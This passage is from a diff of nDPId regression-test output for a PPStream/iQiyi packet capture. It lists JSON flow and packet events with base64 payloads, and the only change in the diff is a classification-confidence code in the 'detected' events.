EzJUU3JUE3JTgwJnNwdD0xNDY3MzUzMTk2JnN0YWdlPTImc3RpbWU9MCZ0dmlkPTQ3OTUzMTAwMCZ1PWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnVwbG9hZF9pZD0mdXJsPWh0dHAlM0ElMkYlMkZ3d3cuaXFpeWkuY29tJTJGdl8xOXJybHZ1eGxnLmh0bWwmdj0yLjAuMTAyLjMwMTQ3JnZlPTMzMzgyNWNkZjQ4NmNjOTRiNmQyOTU2ZjRkZTZkNGNiJnZpZD0yYjk0NzI5ZTNhOTIwYjIxMTk4ODZjNWM2NzdhZTlkYiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUWl5aSBMaXN0IENsaWVudCBQQyA1LjIuMTUuMjI0MA0KSG9zdDogbXNnLmlxaXlpLmNvbQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogY2xvc2UNCkFjY2VwdDogKi8qDQoNCg=="} -01736{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1459,"source":"pps.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196740,"flow_last_seen":1467353196740,"flow_idle_time":7580000,"flow_min_l4_payload_len":1132,"flow_max_l4_payload_len":1132,"flow_tot_l4_payload_len":1132,"flow_avg_l4_payload_len":1132,"midstream":1,"thread_ts_msec":1467353196740,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50777,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": 
{"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?pf=201&p=11&p1=114&ap=0&source1=list&source2=online_l&t=11&ct=pc__ad_play&album_id=180932301&c1=479531000&clt=homedl&cn=160505-%E6%AD%A3%E7%89%87%EF%BC%9A%E9%83%91%E6%81%BA%E6%AC%A7%E5%B7%B4%E4%BA%8C%E6%AC%A1%E5%BD%92%E6%9D%A5%E5%8F%8D%E9%80%86%E8%A2%AD-%E4%BB%8A%E6%99%9A80%E5%90%8E%E8%84%B1%E5%8F%A3%E7%A7%80&cpuuse=32.8&de=32e654fa57be90ec638c46ddfdd66757&dllv=appv%3D5.0.0.1003%7Colv%3D5.0.0.1101&et=0&ft=2175&ht=0&hu=-1&kv=10.0.0.293&lang=&memphy=65&memvir=120&mt=0&mv=5.2.15.2240&p2=1011&pe=&popt=0&pt=0&ptype=1&pu=&r=479531000&r_id=479531000&ra=1&rn=20526&schn_id=200003719%24%24%24%24180932301&schn_name=%E7%BB%BC%E8%89%BA%E5%A8%B1%E4%B9%90%24%24%24%24%E4%BB%8A%E6%99%9A80%E5%90%8E%E8%84%B1%E5%8F%A3%E7%A7%80&spt=1467353196&stage=2&stime=0&tvid=479531000&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&upload_id=&url=http%3A%2F%2Fwww.iqiyi.com%2Fv_19rrlvuxlg.html&v=2.0.102.30147&ve=333825cdf486cc94b6d2956f4de6d4cb&vid=2b94729e3a920b2119886c5c677ae9db","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} +01736{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1459,"source":"pps.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196740,"flow_last_seen":1467353196740,"flow_idle_time":7580000,"flow_min_l4_payload_len":1132,"flow_max_l4_payload_len":1132,"flow_tot_l4_payload_len":1132,"flow_avg_l4_payload_len":1132,"midstream":1,"thread_ts_msec":1467353196740,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50777,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": 
{"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?pf=201&p=11&p1=114&ap=0&source1=list&source2=online_l&t=11&ct=pc__ad_play&album_id=180932301&c1=479531000&clt=homedl&cn=160505-%E6%AD%A3%E7%89%87%EF%BC%9A%E9%83%91%E6%81%BA%E6%AC%A7%E5%B7%B4%E4%BA%8C%E6%AC%A1%E5%BD%92%E6%9D%A5%E5%8F%8D%E9%80%86%E8%A2%AD-%E4%BB%8A%E6%99%9A80%E5%90%8E%E8%84%B1%E5%8F%A3%E7%A7%80&cpuuse=32.8&de=32e654fa57be90ec638c46ddfdd66757&dllv=appv%3D5.0.0.1003%7Colv%3D5.0.0.1101&et=0&ft=2175&ht=0&hu=-1&kv=10.0.0.293&lang=&memphy=65&memvir=120&mt=0&mv=5.2.15.2240&p2=1011&pe=&popt=0&pt=0&ptype=1&pu=&r=479531000&r_id=479531000&ra=1&rn=20526&schn_id=200003719%24%24%24%24180932301&schn_name=%E7%BB%BC%E8%89%BA%E5%A8%B1%E4%B9%90%24%24%24%24%E4%BB%8A%E6%99%9A80%E5%90%8E%E8%84%B1%E5%8F%A3%E7%A7%80&spt=1467353196&stage=2&stime=0&tvid=479531000&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&upload_id=&url=http%3A%2F%2Fwww.iqiyi.com%2Fv_19rrlvuxlg.html&v=2.0.102.30147&ve=333825cdf486cc94b6d2956f4de6d4cb&vid=2b94729e3a920b2119886c5c677ae9db","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} 00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1460,"source":"pps.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":2,"flow_last_seen":1467353196835,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"thread_ts_msec":1467353196835,"pkt":"ABxCjnAxTF4M6gNlCABFAAC0DHtAADMGgP1vzhZNwKhzCABQxlmEGWQaCfXSE1AYACGFOQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjM2IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBjbG9zZQ0KDQo="} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1461,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196856,"flow_last_seen":1467353196856,"flow_idle_time":7580000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353196856,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50778,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00785{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1461,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1467353196856,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":303,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":303,"pkt_l4_len":269,"thread_ts_msec":1467353196856,"pkt":"TF4M6gNlABxCjnAxCABFAAEhMu5AAIAGSgnAqHMI3xpqFMZaAFCbMnrue8hN51AYAQSXSQAAR0VUIC9wcmVpbWFnZS8yMDE2MDUwNi9mMC8xZi92XzExMDM1OTk5OF9tXzYxMV8xNjBfOTBfMS5qcGc\/bm89MSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUWl5aSBMaXN0IENsaWVudCBQQyA1LjIuMTUuMjI0MA0KSG9zdDogcHJlaW1hZ2UxLnFpeWlwaWMuY29tDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXB0OiAqLyoNCg0K"} -00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1461,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196856,"flow_last_seen":1467353196856,"flow_idle_time":7580000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353196856,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50778,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"preimage1.qiyipic.com","url":"preimage1.qiyipic.com\/preimage\/20160506\/f0\/1f\/v_110359998_m_611_160_90_1.jpg?no=1","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} +00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1461,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196856,"flow_last_seen":1467353196856,"flow_idle_time":7580000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353196856,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50778,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"preimage1.qiyipic.com","url":"preimage1.qiyipic.com\/preimage\/20160506\/f0\/1f\/v_110359998_m_611_160_90_1.jpg?no=1","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} 
02154{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1462,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":2,"flow_last_seen":1467353196917,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353196917,"pkt":"ABxCjnAxTF4M6gNlCABFAAUUDjVAADgGss\/fGmoUwKhzCABQxlp7yE3nmzJ751AQAB9cGQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjozNiBHTVQNCkNvbnRlbnQtVHlwZTogaW1hZ2UvanBlZw0KQ29udGVudC1MZW5ndGg6IDY2MTIxMQ0KQ29ubmVjdGlvbjogY2xvc2UNCkV4cGlyZXM6IEZyaSwgMDUgTWF5IDIwMTcgMTc6MzU6NTUgR01UDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTMxNTM2MDAwDQpBY2NlcHQtUmFuZ2VzOiBieXRlcw0KTGFzdC1Nb2RpZmllZDogVGh1LCAwNSBNYXkgMjAxNiAxNjoyMzo1NSBHTVQNClgtQ2FjaGU6IGZyb20gMTI3LjAuMC4xDQpBZ2U6IDQ4ODM0NDENClZpYTogaHR0cC8xLjEgUVRTIChRVFMgW2NIcyBmIF0pDQpYLUNhY2hlOiBmcm9tIDEwLjIyMS4zMi4yMTYNClgtQ2FjaGU6IE1JU1MgZnJvbSAyMjMuMjYuMTA2LjIwDQoNCv\/Y\/+AAEEpGSUYAAQEAAAEAAQAA\/9sAQwADAgIDAgIDAwMDBAMDBAUIBQUEBAUKBwcGCAwKDAwLCgsLDQ4SEA0OEQ4LCxAWEBETFBUVFQwPFxgWFBgSFBUU\/9sAQwEDBAQFBAUJBQUJFA0LDRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU\/\/4AC3FpeWkxLjAuM\/\/AABEIA4QGQAMBIgACEQEDEQH\/xAAeAAACAwADAQEBAAAAAAAAAAAGBwQFCAIDCQABCv\/EAHAQAAEDAwMCAwUEBAoDCgcAIwECAwQFBhEAEiEHMRMiQQgUUWFxFSMygUKRobEJFiQzUmJywdHwJYLhFzRDc5KywsTS1CY1U2Oiw\/EYNkR0g4aTlKSz01RWZGZ1doSjtBknRUZVhZWWxdW14jdXZf\/EAB0BAAIDAQEBAQEAAAAAAAAAAAUGAwQHAgEIAAn\/xABKEQACAQMDAQUEBwYFAwQBAQkBAgMABBEFEiExBhMiQVEUYXGRIzKBobHB0QcVJELh8DM0UmJyFiXxJjU2Q4KSF0RTc6LCY7LS\/9oADAMBAAIRAxEAPwDytAyeNWtFoU6vyTFgRlSXcbsJ9B8fl+eqxHqdN32eupf+5vW5UmPVHaHUHUpMapNHCmlDdxnBxnP7NTSEouRRHT4I7mdYpW2g0MdQukl49JKsmm3fb0+gS3BuZ97aKUPpwDubWPK4MKHKVEc6GfB+71qP21vapV7RkmgxSmNKRQ8iNNSkh8JU22lxLigdq962\/E4T5c4BOs+RYyXt+9GvEJIzXtxb9zIY85++q2mvKhvb0f6yf6Q1fvM+8sb2vwajqp2x9KEaMLI6f1e5vG9xjq92\/SfdVsZCvmo9z8k5+mpopSG2jmvYSyHaelDtuyUwH0vLXs82ngvqqxcNDk0eP4PljJZU\/wCH5nMjBx9B6
6X\/AFL6K3H04lNe+x25cNxhuQ3JiKK0bVDI3DgpPxyPz0GUyqzaa9vjp93WrCfER6D4jRLayjnijVvclPAKOG4EOlTUKQvwv6qv0vppy2vUkLpxXv3o2+XSltd5ittlC0KkPf8ACSZPJ47AZ9NGTdbjURtq"} 02161{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1463,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":3,"flow_last_seen":1467353196917,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353196917,"pkt":"ABxCjnAxTF4M6gNlCABFAAUUDjZAADgGss7fGmoUwKhzCABQxlp7yFLTmzJ751AQAB+1AQAAFHWnfu3ebsPmflqKi8LbOppt0aSln8a0oQnzOKX6fXTzo\/s7tX30MrdPrafdJ9wOpqEVa0+eCttATGWR8cDKh8HCNIf2Y7kse++qsW3Z9ZRJmISqRHhlv7ua8gbtu88KwMqCRndtPwwr0FYe3t6IW8WfGaEajdpKO6T7a8f7q6eXHYM73S46PKpTyVFtK32z4SyP6Dn4VD6HUejUGdXqrT6VTI\/vdSmvtxYrHiJaC1rVtGVnhKfUlR4AJ16QVv3OsV+5oM2OzU4HhtpejSW0raWT2G05\/CnHPx0obh9myNSbjod09Pap\/FmsUupt1BtqSFvxFhIVlBSDuGc4POMZxg6\/XEcyITHyaXYrUM4B6Gst3D0dv22KjesSo2u6f4mtIdrsiFKafZjNrwULQrI8Tck7ylIyACVAaiTOjt7U2gUet1O2pFNpVZYVKp8lx5twPNBIWVHYo+Gdp3bV4OAT6a0xfk3q\/SqN1XjzmEVOHe7qXEyae+XGKY3w2pLbYTkbmQG1KIB8iTyd2lNevUKq1roxZ9hNOOsfYa1eNIShLQeSlstNIGw5O1CnASr8W7nOlh7u7jOGFMEOl2hfEkoApQO9P60p+VHRCeW9Ec2SG0srUtlWCdqwE+U4B4Vj8OhesUp+lSlx5aPCeR+JH6Q5wQfgc8YOmdXrjbcYne5Ux2lTJLiXHJbVVkuLOM\/i3K8xIJGVZ+Whhi7ZNK97Rs94XJTtcddcO4\/iJyfiSrOdXLa6mdvGK5v7Kygi320m41QWoypc57\/iT+8apK8zsqsv\/jDpm2pcKnrVl09bSdkbwvvd310AXb\/41P8AxaP3aMQybnNCnTFuDTCmX\/AehhjDIbSAPKnVJGrkeoyvd4EUynsZ2oT6D4nPH5n5aB6xc36KEI3fQaNvZ9v2pWncEydBmyKVU3Ep92qEfylsjdxnHGd37OdCJbRljMvU0q6Zo8N7cql0+1T5129VKLc\/Syqil3Xa9Qt6Y4kqZEyPtQ+njzNODyuDBTkpJxuGdLxuRMrLm2NCed3f0Ua2H7T3WGX7SU6g\/bURj3OhpKYcnGJKkqabS6HFA7Vblo8TAAx2ydKmO5DpLKWocZKNv6WdWraPwBzwa8vLeGwmMKDcR6HNLKkWS6k+LPgSD8vTRRGTIZ2tQ6a6P7RGNXc64okVKlPvo+m7QlVup7Dfkjqb\/I6u7iPOh+55T9XirgVKTSfPK4\/qJc1El3vLmJU2xD\/1lk6Cn788Zwq2hav62Tr4Xw5t8qUj\/V1x3j\/y8VaEMnklWFQg1yY2l9X3TKzhPwOO\/wCrOulNLqCW9q5pS38E5xrn\/HR+bQfdURl+9Ik+MiUCQkp27S3t7ZJwd2dc7URUalW
IrlTZe+yVFXiOKSdnrjJHzx664DsR1oitrcEgAYqJ4K4v4Xx+rXwlFKfM\/wDs0YdYLVi2\/R6VPpjS\/DlZS67HytltSOVZVk4J3JIB+fOlYZC9vm8356mTGM1O9q8bbSc1bSFNq3bXV7tdLCXHlbfHA4yVHOAB+v8AdqvebmNspfcQUtr7HXFp7wVbtxV6HUrHCHb1qxDGAw39KNZfTyrU1Q94TGRmImaFLfH8yr8Kvz+HfUumWDVqp44YfiL8BxDToEgJCFKKgkHPx2q5Hw510nqOxJTJT\/Fqmp8SP7sOM+HyrCx\/X8xyeO6vUjFt"} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1601,"source":"pps.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353197131,"flow_last_seen":1467353197131,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353197131,"l3_proto":"ip4","src_ip":"192.168.115.1","dst_ip":"239.255.255.250","src_port":50945,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00621{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1601,"source":"pps.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1467353197131,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353197131,"pkt":"AQBef\/\/6dNArkea6CABFAAChc\/sAAAERIa3AqHMB7\/\/\/+scBB2wAjWbYTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 
-00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1601,"source":"pps.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353197131,"flow_last_seen":1467353197131,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353197131,"l3_proto":"ip4","src_ip":"192.168.115.1","dst_ip":"239.255.255.250","src_port":50945,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1601,"source":"pps.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353197131,"flow_last_seen":1467353197131,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353197131,"l3_proto":"ip4","src_ip":"192.168.115.1","dst_ip":"239.255.255.250","src_port":50945,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00605{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1686,"source":"pps.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":2,"flow_last_seen":1467353197240,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":165,"pkt_l4_len":131,"thread_ts_msec":1467353197240,"pkt":"AQBef\/\/6dNArkea6CABFAACXc\/0AAAERIbXAqHMB7\/\/\/+scBB2wAg2oBTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOk1lZGlhU2VydmVyOjENCk1hbjoic3NkcDpkaXNjb3ZlciINCk1YOjMNCg0K"} 
00609{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1687,"source":"pps.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":3,"flow_last_seen":1467353197271,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":167,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":167,"pkt_l4_len":133,"thread_ts_msec":1467353197271,"pkt":"AQBef\/\/6dNArkea6CABFAACZc\/4AAAERIbLAqHMB7\/\/\/+scBB2wAhQmdTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOk1lZGlhUmVuZGVyZXI6MQ0KTWFuOiJzc2RwOmRpc2NvdmVyIg0KTVg6Mw0KDQo="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1995,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353197951,"flow_last_seen":1467353197951,"flow_idle_time":7580000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1467353197951,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50779,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
02136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1995,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1467353197951,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353197951,"pkt":"TF4M6gNlABxCjnAxCABFAAUUM2tAAIAGCK3AqHMIb84WTcZbAFDJCjAgTd\/tYVAQAQRxYwAAR0VUIC9iP3BmPTIwMSZwPTExJnAxPTExNCZhcD0wJnNvdXJjZTE9bGlzdCZzb3VyY2UyPW9ubGluZV9sJnQ9MjAxJmN0PWNsdF9fcGxfcGxheSZhbGJ1bV9pZD0xODA5MzIzMDEmYzE9NDc5NTMxMDAwJmNsdD1ob21lZGwmY249MTYwNTA1LSVFNiVBRCVBMyVFNyU4OSU4NyVFRiVCQyU5QSVFOSU4MyU5MSVFNiU4MSVCQSVFNiVBQyVBNyVFNSVCNyVCNCVFNCVCQSU4QyVFNiVBQyVBMSVFNSVCRCU5MiVFNiU5RCVBNSVFNSU4RiU4RCVFOSU4MCU4NiVFOCVBMiVBRC0lRTQlQkIlOEElRTYlOTklOUE4MCVFNSU5MCU4RSVFOCU4NCVCMSVFNSU4RiVBMyVFNyVBNyU4MCZjcHV1c2U9MTQuMSZkZT0zMmU2NTRmYTU3YmU5MGVjNjM4YzQ2ZGRmZGQ2Njc1NyZkbGx2PWFwcHYlM0Q1LjAuMC4xMDAzJTdDb2x2JTNENS4wLjAuMTEwMSZldD0wJmZ0PTIxNzUmaHQ9MCZodT0tMSZpc2RtPTAmaXNsb2NhbD0wJmt2PTEwLjAuMC4yOTMmbGFuZz0mbWVtcGh5PTY3Jm1lbXZpcj0xMjEmbXQ9MCZtdj01LjIuMTUuMjI0MCZwMj0xMDExJnBlPSZwb3B0PTAmcHQ9MiZwdHlwZT0xJnB1PSZyPTQ3OTUzMTAwMCZyX2lkPTQ3OTUzMTAwMCZyYT0xJnJuPTIzOTg3JnNjaG5faWQ9MjAwMDAzNzE5JTI0JTI0JTI0JTI0MTgwOTMyMzAxJnNjaG5fbmFtZT0lRTclQkIlQkMlRTglODklQkElRTUlQTglQjElRTQlQjklOTAlMjQlMjQlMjQlMjQlRTQlQkIlOEElRTYlOTklOUE4MCVFNSU5MCU4RSVFOCU4NCVCMSVFNSU4RiVBMyVFNyVBNyU4MCZzcHQ9MTQ2NzM1MzE5NyZzdGltZT0wJnR2aWQ9NDc5NTMxMDAwJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdXBsb2FkX2lkPSZ1cmw9aHR0cCUzQSUyRiUyRnd3dy5pcWl5aS5jb20lMkZ2XzE5cnJsdnV4bGcuaHRtbCZ2PTIuMC4xMDIuMzAxNDcmdmU9MzMzODI1Y2RmNDg2Y2M5NGI2ZDI5NTZmNGRlNmQ0Y2ImdmlkPTJiOTQ3MjllM2E5MjBiMjExOTg4NmM1YzY3N2FlOWRiJm1zZz1NWHcwZkFkUUFGSURVZ0ZSU0FCNmR3TmtCUUptZlhWM2RubGhZbmxJQlhUVnh5NGFPTDBBZEM2UVdSYURTS0IxY29kZGkxT3J0aUF6TmYzSDhwZUN2MUwlMkZSMiUyQjZUWUZEVXptSXA5b29TJTJGc3FRME50aEpLVDNBSHRDSkg2SmFLSGQxS2RwTDZwRVJ5bTBKM0FOUWxWUzluQWx3bGw2ciUyQjNMVzlpbXVHd2ZoNCUzRCBIVF
RQLzEuMQ0KVXNlci1BZ2VudDogUWl5aSBMaXN0IENsaWVudCBQQyA1LjIuMTUuMjI0MA0KSG9zdDogbXNnLmlxaXlpLmNvbQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpQcmFnbWE6"} -01934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1995,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353197951,"flow_last_seen":1467353197951,"flow_idle_time":7580000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1467353197951,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50779,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?pf=201&p=11&p1=114&ap=0&source1=list&source2=online_l&t=201&ct=clt__pl_play&album_id=180932301&c1=479531000&clt=homedl&cn=160505-%E6%AD%A3%E7%89%87%EF%BC%9A%E9%83%91%E6%81%BA%E6%AC%A7%E5%B7%B4%E4%BA%8C%E6%AC%A1%E5%BD%92%E6%9D%A5%E5%8F%8D%E9%80%86%E8%A2%AD-%E4%BB%8A%E6%99%9A80%E5%90%8E%E8%84%B1%E5%8F%A3%E7%A7%80&cpuuse=14.1&de=32e654fa57be90ec638c46ddfdd66757&dllv=appv%3D5.0.0.1003%7Colv%3D5.0.0.1101&et=0&ft=2175&ht=0&hu=-1&isdm=0&islocal=0&kv=10.0.0.293&lang=&memphy=67&memvir=121&mt=0&mv=5.2.15.2240&p2=1011&pe=&popt=0&pt=2&ptype=1&pu=&r=479531000&r_id=479531000&ra=1&rn=23987&schn_id=200003719%24%24%24%24180932301&schn_name=%E7%BB%BC%E8%89%BA%E5%A8%B1%E4%B9%90%24%24%24%24%E4%BB%8A%E6%99%9A80%E5%90%8E%E8%84%B1%E5%8F%A3%E7%A7%80&spt=1467353197&stime=0&tvid=479531000&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&upload_id=&url=http%3A%2F%2Fwww.iqiyi.com%2Fv_19rrlvuxlg.html&v=2.0.102.30147&ve=333825cdf486cc94b6d2956f4de6d4cb&vid=2b94729e3a920b2119886c5c677ae9db&msg=MXw0fAdQAFIDUgFRSAB6dwNkBQJmfXV3dnlhYnlIBXTVxy4aOL0AdC6QWRaDSKB1coddi1OrtiAzNf3H8peCv1L%2FR2%2B6TYFDUzmIp9ooS%2FsqQ0NthJKT3AHtCJH6JaKHd1KdpL6pERym0J3ANQlVS9nAlwll6r%2B3LW9imuGwfh4
